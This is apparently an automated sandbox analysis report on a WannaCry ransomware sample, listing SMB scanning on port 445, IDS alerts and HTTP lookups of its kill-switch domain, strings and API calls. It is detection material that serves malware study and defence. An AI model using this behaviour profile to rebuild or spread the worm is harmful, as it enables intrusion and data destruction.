                  Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
                  Source: xIwkOnjSIa.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                  Source: unknownHTTPS traffic detected: 23.211.4.90:443 -> 192.168.2.3:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49861 version: TLS 1.2
                  Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: tasksche.exe, 00000009.00000000.254394679.000000000042A000.00000002.00000001.01000000.00000006.sdmp, tasksche.exe, 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmp, tasksche.exe, 0000000A.00000002.765126869.000000000042A000.00000002.00000001.01000000.00000006.sdmp, tasksche.exe, 0000000A.00000000.259120433.000000000042A000.00000002.00000001.01000000.00000006.sdmp, xIwkOnjSIa.dll, mssecsvr.exe.3.dr, tasksche.exe.5.dr
                  Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20221222_180435_142.etl.19.dr
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00409476 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,9_2_00409476
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0040DE5E SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,9_2_0040DE5E

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2830018 ETPRO TROJAN Observed WannaCry Domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff .com in DNS Lookup) 192.168.2.3:59869 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2830018 ETPRO TROJAN Observed WannaCry Domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff .com in DNS Lookup) 192.168.2.3:59324 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2830018 ETPRO TROJAN Observed WannaCry Domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff .com in DNS Lookup) 192.168.2.3:61626 -> 8.8.8.8:53
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 59611
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 59794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 59900
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60220
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60550
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60656
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60986
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 61330
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 61444
                  Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 10ee8d30a5d01c042afd7b2b205facc4
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheHost: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /?subid1=20221222-2004-15a5-aec0-299192b1f656 HTTP/1.1Cache-Control: no-cacheHost: ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comCache-Control: no-cacheCookie: __tad=1671699853.2492624
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheHost: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 87284Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1671732236826&AC=1&CPH=4ef661f2
                  Source: unknownNetwork traffic detected: IP country count 26
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/P
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/p
                  Source: svchost.exe, 0000000F.00000002.318886505.000001BD66013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp99ifjaposdfjhgosurijfaewrwergwff.com/33ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrw
                  Source: mssecsvr.exe.3.drString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/0
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/P
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/k
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/l
                  Source: mssecsvr.exe, 00000007.00000002.764580086.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comJ
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.coma
                  Source: svchost.exe, 0000000D.00000002.765311771.000002029A43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                  Source: svchost.exe, 0000000D.00000002.765311771.000002029A43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                  Source: svchost.exe, 0000000D.00000002.765311771.000002029A43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                  Source: svchost.exe, 0000000D.00000002.765311771.000002029A43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comr
                  Source: svchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                  Source: svchost.exe, 0000000D.00000002.765311771.000002029A43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                  Source: svchost.exe, 0000000D.00000002.765311771.000002029A43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                  Source: svchost.exe, 0000000F.00000003.316197481.000001BD6605C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                  Source: svchost.exe, 0000000F.00000003.316197481.000001BD6605C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319127172.000001BD6605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                  Source: svchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                  Source: svchost.exe, 0000000F.00000002.319065392.000001BD6603D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                  Source: svchost.exe, 0000000F.00000003.316197481.000001BD6605C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319127172.000001BD6605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                  Source: svchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                  Source: svchost.exe, 0000000F.00000003.316636238.000001BD66047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319096880.000001BD6604D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                  Source: svchost.exe, 0000000F.00000003.316197481.000001BD6605C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319127172.000001BD6605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                  Source: svchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                  Source: svchost.exe, 0000000F.00000002.319065392.000001BD6603D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                  Source: svchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                  Source: svchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                  Source: svchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                  Source: svchost.exe, 0000000F.00000003.292823147.000001BD66031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                  Source: svchost.exe, 0000000F.00000003.316809924.000001BD66041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319083060.000001BD66042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                  Source: svchost.exe, 0000000F.00000003.316809924.000001BD66041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319083060.000001BD66042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                  Source: svchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                  Source: svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319120846.000001BD66058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316619808.000001BD66057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                  Source: svchost.exe, 0000000F.00000003.316197481.000001BD6605C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                  Source: svchost.exe, 0000000F.00000002.319120846.000001BD66058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316619808.000001BD66057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 0000000F.00000002.319120846.000001BD66058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316619808.000001BD66057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 0000000F.00000003.315727630.000001BD66064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                  Source: svchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                  Source: svchost.exe, 0000000F.00000002.319065392.000001BD6603D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                  Source: svchost.exe, 0000000F.00000003.292823147.000001BD66031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                  Source: svchost.exe, 0000000F.00000002.319075342.000001BD66040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                  Source: svchost.exe, 0000000F.00000002.318886505.000001BD66013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319065392.000001BD6603D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                  Source: svchost.exe, 0000000F.00000003.292823147.000001BD66031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 0000000F.00000003.316677637.000001BD66045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 0000000F.00000003.292823147.000001BD66031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                  Source: svchost.exe, 0000000F.00000002.319054075.000001BD6603A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.292823147.000001BD66031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                  Source: svchost.exe, 0000000F.00000003.316636238.000001BD66047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319096880.000001BD6604D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                  Source: unknownDNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                  Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheHost: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /?subid1=20221222-2004-15a5-aec0-299192b1f656 HTTP/1.1Cache-Control: no-cacheHost: ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comCache-Control: no-cacheCookie: __tad=1671699853.2492624
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheHost: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comConnection: Keep-Alive
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 22 Dec 2022 09:04:13 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 22 Dec 2022 09:04:17 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                  Source: unknownTCP traffic detected without corresponding DNS query: 140.162.4.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 132.20.133.94
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 44.107.25.199
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
